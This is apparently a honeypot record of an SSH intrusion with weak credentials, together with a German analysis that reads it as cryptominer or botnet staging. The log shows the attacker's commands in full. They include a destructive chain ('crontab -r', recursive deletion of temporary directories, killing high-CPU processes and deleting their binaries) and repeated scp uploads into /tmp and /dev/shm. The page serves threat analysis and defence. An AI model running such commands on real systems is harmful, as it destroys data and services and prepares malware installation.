07.10.2026, 05:00 UTC · 70 Befehle · über ssh · Niederlande
user='shadow' pass='qwerty' shadow@srv01:~$ uname -s -v -n -r -m Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64 shadow@srv01:~$ uname -m | awk '{printf $1}' x86_64 shadow@srv01:~$ uptime | grep -ohe 'up .*' | sed 's/,//g' | awk '{ print $2" "$3 }' up 8 days, 03:45 shadow@srv01:~$ lspci | egrep VGA && lspci | grep 3D 00:02.0 VGA compatible controller: Intel Corporation Xeon E3-1200 v5/E3-1200 v6 | 3rd Generation Core (Intel 4th Gen) Integrated Graphics Controller (rev 06) shadow@srv01:~$ lscpu | egrep "Model name:" | cut -d ' ' -f 14- Intel(R) Xeon(R) CPU E5-2620 v4 @ 2.10GHz shadow@srv01:~$ curl ipinfo.io/org AS140612 shadow@srv01:~$ nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | wc -l | head -c 1 bash: nvidia-smi: command not found shadow@srv01:~$ lspci | egrep VGA | grep Radeon | wc -l | head -c 1 0 shadow@srv01:~$ uname -n | awk '{printf $1}' vps-12 shadow@srv01:~$ crontab -r ; rm -rf /var/tmp/.* /var/tmp/* /tmp/.* /tmp/* ; ps aux | awk '$3 > 40.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; done ; ps aux | awk '$4 > 60.0 && $11 !~ /sshd/ {print $2}' | while read pid; do readlink -f /proc/$pid/exe 2>/dev/null | xargs rm -f 2>/dev/null; kill -9 $pid 2>/dev/null; d… bash: pidof: command not found bash: pkill: command not found shadow@srv01:~$ echo qwerty > /tmp/d.log shadow@srv01:~$ scp -qt "/var/tmp/TeRUjcUZ" shadow@srv01:~$ scp -qt "/tmp/TeRUjcUZ" shadow@srv01:~$ scp -qt "/dev/shm/TeRUjcUZ" shadow@srv01:~$ uname -s -v -n -r -m Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64 shadow@srv01:~$ nvidia-smi -q | grep "Product Name" bash: nvidia-smi: command not found shadow@srv01:~$ uname -r | awk '{printf $1}' 4.15.0-213-generic shadow@srv01:~$ echo changeme > /tmp/d.log shadow@srv01:~$ scp -qt "/var/tmp/JkqhXQpK" shadow@srv01:~$ scp -qt "/tmp/JkqhXQpK" shadow@srv01:~$ scp -qt "/dev/shm/JkqhXQpK" shadow@srv01:~$ uname -s -v -n -r -m Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64 shadow@srv01:~$ echo Password > /tmp/d.log shadow@srv01:~$ scp -qt "/var/tmp/euDzGKrl" shadow@srv01:~$ scp -qt "/tmp/euDzGKrl" shadow@srv01:~$ scp -qt "/dev/shm/euDzGKrl" shadow@srv01:~$ uname -s -v -n -r -m Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64 shadow@srv01:~$ echo pass > /tmp/d.log shadow@srv01:~$ scp -qt "/var/tmp/rzoykfia" shadow@srv01:~$ scp -qt "/tmp/rzoykfia" shadow@srv01:~$ scp -qt "/dev/shm/rzoykfia" shadow@srv01:~$ uname -s -v -n -r -m Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64 shadow@srv01:~$ echo administrator > /tmp/d.log shadow@srv01:~$ scp -qt "/var/tmp/mbbfNpkW" shadow@srv01:~$ scp -qt "/tmp/mbbfNpkW" shadow@srv01:~$ scp -qt "/dev/shm/mbbfNpkW" shadow@srv01:~$ uname -s -v -n -r -m Linux 4.15.0-213-generic #213-Ubuntu SMP Fri Jan 15 10:52:24 UTC 2021 x86_64 shadow@srv01:~$ echo Admin > /tmp/d.log shadow@srv01:~$ scp -qt "/var/tmp/NaCedaUa"
Der Angreifer meldete sich mit schwachen Zugangsdaten über SSH an und führte eine Reihe von Systemabfragen durch, um Hardwarekomponenten wie CPU und Grafikkarte zu identifizieren. Anschließend löschte er temporäre Dateien und beendete Prozesse mit hoher CPU-Auslastung, um Ressourcen freizugeben. Danach versuchte er, mehrere Dateien über SCP in verschiedene temporäre Verzeichnisse zu übertragen, wobei er wiederholt dieselben Muster mit unterschiedlichen Dateinamen wiederholte.
Die Befehle uname, lscpu und lspci sammeln Informationen über das Betriebssystem, die CPU und die Grafikkarte, um die Mining-Fähigkeiten des Systems zu prüfen. Der Befehl crontab -r löscht geplante Aufgaben, während rm -rf temporäre Dateien entfernt, um Spuren zu verwischen. Der awk-Befehl identifiziert Prozesse mit hoher CPU-Last und beendet diese, um Rechenleistung für den Miner zu sichern. Die scp-Befehle mit dem Flag -qt übertragen Dateien im Batch-Modus in spezifische Pfade wie /var/tmp oder /dev/shm, was auf das Hochladen von Schadsoftware hindeutet. Die echo-Befehle schreiben Teststrings in Logdateien, um die Schreibrechte in diesen Verzeichnissen zu verifizieren.
Das Vorgehen deutet stark auf die Installation eines Kryptominers hin, da die Abfrage der GPU-Modelle und das Beenden konkurrierender Prozesse typische Vorbereitungsschritte sind. Die wiederholten SCP-Übertragungen in versteckte Verzeichnisse dienen vermutlich dem Download der Mining-Software oder eines Botnet-Agents. Da die Shell als Fake-Shell antwortete, blieb die eigentliche Payload-Ausführung aus, aber die Absicht ist klar erkennbar.
Dieses Muster ist bei automatisierten Botnet-Angriffen sehr verbreitet, da Skripte standardisierte Abfragen und Platzhalter für Payloads nutzen. Die Kombination aus Hardware-Erkennung und aggressiver Prozessbereinigung ist ein klassisches Indiz für automatisierte Mining-Kampagnen.